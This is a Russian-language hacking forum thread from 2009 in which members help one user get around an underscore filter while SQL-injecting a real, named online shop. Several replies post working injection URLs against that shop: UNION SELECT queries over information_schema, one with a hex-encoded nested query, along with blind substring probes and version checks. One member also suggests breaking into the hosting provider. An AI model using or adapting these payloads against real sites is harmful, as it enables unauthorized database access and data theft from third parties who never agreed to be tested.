Альтернатива _ при SQL-inject'e

Discussion in 'Уязвимости' started by Dima-k17, 16 Apr 2009.

Thread Status:
Not open for further replies.
  1. Dima-k17

    Dima-k17 Elder - Старейшина

    Joined:
    15 Sep 2005
    Messages:
    29
    Likes Received:
    19
    Reputations:
    20
    Собственно возник такой вопрос....
    Имеем инъекцию вида:
    http://site.com/super_page_123_321_174.html
    При
    http://site.com/super_page_123_321'_174.html
    Получаем тупую инъекцию в WHERE id='321''
    Однако при попытке встроить туда запрос вида:
    http://site.com/super_page_123_321+union+select+1,`table_name`,3+from+information_schema.tables+limit+1--_174.html
    Получаем ошибку в связи с тем, что читается строка до символа "_". Вопрос:
    Можно ли чем-то заменить этот символ в столбце\названии таблицы?
    Для примера ссылка:
    http://www.cafegadgets.com/dvd-players-c-63%27_174.html
    Заранее спасибо!
     
    2 people like this.
  2. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,390
    Likes Received:
    1,209
    Reputations:
    475
    впринципе нет
    но так как тут скорее всего мод реврайт, ты можешь в гугле или в вебархиве поискать ссылки где ещё мод реврайт не поставили, мб тебе повезёт
    или подбирай таблицы вручную
     
    2 people like this.
  3. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93


    http://www.cafegadgets.com/pioneer-dvr550hs-recorder-p-1976+and+ascii(substring((select+concat_ws(0x2F,table_name,table_schema,column_name)+from+information_schema.columns+limit+0,1),1,1))>5.html

    Где-то тут был скрипт для посимвольного перебора, возьми его, заюзай и ступай с миром
     
    #3 ElteRUS, 16 Apr 2009
    Last edited: 16 Apr 2009
  4. Dima-k17

    Dima-k17 Elder - Старейшина

    Joined:
    15 Sep 2005
    Messages:
    29
    Likes Received:
    19
    Reputations:
    20
    лол=) спасибо конечно за то что с миром послали, но тема вопроса в том, можно ли это обойти в конкретной ситуации?:) Я правильно понял, что нет? Только используя скулю в другом месте?
     
  5. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    да
     
  6. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    Можно и здесь:
    Code:
    http://www.cafegadgets.com/dvd-players-c-63+and%201=2%20union+select+0x3120756e696f6e2073656c6563742076657273696f6e28292c636f6e636174283078326433312c7461626c655f6e616d65292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573206c696d697420312c31,0x27,0x27--_174.html
     
    2 people like this.
  7. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Code:
    http://www.cafegadgets.com/dvd-players-c-63%20and%20substring(version(),1,1)=5--_174.html
    
    Плюсы не испльзовать по этой ссылке, только пробелы или сразу %20

    Пятая ветка

    подбираем кол-во столбцов:

    Code:
    http://www.cafegadgets.com/dvd-players-c-63%20union%20select%201,2,3--_174.html
    
    дальше сам:)
     
  8. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,138
    Reputations:
    350
    Pashkela ты вопрос читал?
    У человека не проходит символ "_" , он нужен при выборке из information_schema, всё остальное там работает отлично с выводом, как положено
     
    1 person likes this.
  9. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    А чем мой вариант плох?
     
    2 people like this.
  10. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    Случай слишком уж частный, т.к. 'двойные' запросы встречаются намного реже чем 'не двойные'. Не будь его здесь - фильтрацию не удалось бы обойти, чего так отчаянно хочет тс (если сейчас еще кто-нибудь чего-нибудь не выдумает).

    Впрочем я не спорю здесь это превосходно прокатило, а это главное. Нужно прокачивать наблюдательность и смекалку =)
     
  11. pampom

    pampom Elder - Старейшина

    Joined:
    23 Apr 2008
    Messages:
    34
    Likes Received:
    5
    Reputations:
    0
    1) найти движок, сайт с движком, сломать сайт другим способом слить движок и ижектить напрямую а не через мод реврайт.
    2) попробывать логически пробрутить варианты без мод реврайт.
    3) если > 4.0 ветка использывать 0xимя таблицы в хексе.
    4) не использывать данный символ а например пробурить по словарику.
    5) самый верный 100% ломать хостера.

    Самый нормальный вариант предложил Scipio но я бы нашел данный движок.
    2Pashkela какой смысл использывать посивольный перебор?


    (c) [cash] hack-shop.org.ru
     
  12. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    потому что он форевер, имхо. Остальное дурь и блажь
     
  13. pampom

    pampom Elder - Старейшина

    Joined:
    23 Apr 2008
    Messages:
    34
    Likes Received:
    5
    Reputations:
    0
    Ну вот первых это очень компрометирует тебя если не работает метод пост.
    Во вторных на норм серваках твои ип локнеться после 20 попыток
    В третих зачем делать посимвольный если есть вывод? а если надо слить базу в 100к записей?
    И в четвертых какая разница как бирать если и в том и в том случае будет использывать _ ?

    Приведи хотя бы 1 нормальный аргумент...

    Читай вопросы внимательнее.

    (c) [cash] hack-shop.org.ru
     
  14. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,138
    Reputations:
    350
    А что там искать то? Это oscommerce все баги в паблике , там скули ВЕЗДЕ, я думал вопрос был именно про обход "_".
    Конечно пример Scipio работает, и подходит к этой ситуации, но в общем и целом это всё-же не выход
     
  15. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Да, господин. Пошол курить RTFM

    PS: Выпить не дадут
     
  16. Dima-k17

    Dima-k17 Elder - Старейшина

    Joined:
    15 Sep 2005
    Messages:
    29
    Likes Received:
    19
    Reputations:
    20
    2 scipio - спасибо=) Действительно, не подумал использовать запрос в запросе, но это действительно частный случай.
    2 all - вопрос стоял именно в обходе фильтрации. Инжект без мод_реврайта скорее всего прокатил бы, но если не брать случай с OsCommerce, то это не так-то просто=\
    2 pashkela - угу, посимвольный перебор конечно true, но когда нужно что-то сдампить, сидеть до второго пришествия как-то не хочется=\
    Еще раз всем спасибо, тему можно закрывать.
     
Loading...
Thread Status:
Not open for further replies.